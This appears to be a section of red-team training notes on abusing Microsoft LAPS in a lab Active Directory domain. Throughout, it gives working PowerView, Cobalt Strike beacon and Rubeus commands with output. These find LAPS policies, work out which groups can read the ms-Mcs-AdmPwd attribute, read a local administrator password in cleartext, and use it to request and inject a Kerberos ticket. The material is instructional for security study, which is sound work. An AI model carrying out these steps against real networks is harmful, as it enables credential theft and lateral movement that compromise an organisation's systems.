8. LAPS

Finding Presence

If it's applied to a machine that you have access to, AdmPwd.dll will be on disk.

ls C:\\Program Files\\LAPS\\CSE

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 179kb    fil     05/05/2021 07:04:14   AdmPwd.dll

We could also search for GPOs that have "LAPS" or some other descriptive term in the name.

powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

usncreated               : 25966
displayname              : LAPS
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{C6DC5466-785
                           A-11D2-84D0-00C04FB169F7}{942A8E4F-A261-11D1-A760-00C04FB9603F}][{D76B9641-3288-4F75-942D-08
                           7DE603E3EA}{D02B1F72-3407-48AE-BA88-E8213C6761F1}]
whenchanged              : 8/16/2022 12:39:45 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 26068
dscorepropagationdata    : {9/7/2022 1:05:58 PM, 1/1/1601 12:00:00 AM}
name                     : {2BE4337D-D231-4D23-A029-7B999885E659} # GPO ID

As well as computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null

powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

dnshostname
-----------
wkstn-2.dev.cyberbotic.io
web.dev.cyberbotic.io
sql-2.dev.cyberbotic.io
wkstn-1.dev.cyberbotic.io

Downloading Info

If we locate the correct GPO, we can download the LAPS configuration from the gpcfilesyspath.

ls \\\\dev.cyberbotic.io\\SysVol\\dev.cyberbotic.io\\Policies\\{2BE4337D-D231-4D23-A029-7B999885E659}\\Machine

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 12:39:19   Applications
          dir     09/13/2022 15:38:58   Microsoft
          dir     08/16/2022 12:23:37   Preferences
          dir     08/16/2022 12:21:04   Scripts
 575b     fil     08/16/2022 12:22:23   comment.cmtx
 920b     fil     08/16/2022 12:22:23   Registry.pol

beacon> download \\\\dev.cyberbotic.io\\SysVol\\dev.cyberbotic.io\\Policies\\{2BE4337D-D231-4D23-A029-7B999885E659}\\Machine\\Registry.pol
[*] started download of \\\\dev.cyberbotic.io\\SysVol\\dev.cyberbotic.io\\Policies\\{2BE4337D-D231-4D23-A029-7B999885E659}\\Machine\\Registry.pol (920 bytes)
[*] download of Registry.pol is complete

Parse-PolFile to convert this file into human-readable format.

PS C:\\Users\\Attacker> Parse-PolFile .\\Desktop\\Registry.pol

KeyName     : Software\\Policies\\Microsoft Services\\AdmPwd
ValueName   : PasswordComplexity
ValueType   : REG_DWORD
ValueLength : 4
ValueData   : 3

KeyName     : Software\\Policies\\Microsoft Services\\AdmPwd
ValueName   : PasswordLength
ValueType   : REG_DWORD
ValueLength : 4
ValueData   : 14

KeyName     : Software\\Policies\\Microsoft Services\\AdmPwd
ValueName   : PasswordAgeDays
ValueType   : REG_DWORD
ValueLength : 4
ValueData   : 30

Impersonating users who can access LAPS

Discover which principals are allowed to read the ms-Mcs-AdmPwd attribute

powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier | fl

ObjectDN                                                      SecurityIdentifier
--------                                                      ------------------
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io         S-1-5-21-569305411-121244042-2357301523-1107
CN=WEB,OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io   S-1-5-21-569305411-121244042-2357301523-1108
CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io         S-1-5-21-569305411-121244042-2357301523-1107

powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
DEV\\Developers

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1108
DEV\\Support Engineers

Users in Developers group and Support Engineers group can read the LAPS password

powershell Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd

ms-mcs-admpwd
-------------
1N3FyjJR5L18za

Create a TGT using the LAPS credentials and pass the ticket

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:LapsAdmin /password:1N3FyjJR5L18za/nowrap

C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe createnetonly /program:C:\\Windows\\System32\\cmd.exe /domain:DEV /username:LapsAdmin /password:FakePass /ticket:doIFwj[...]MuSU8= /ptt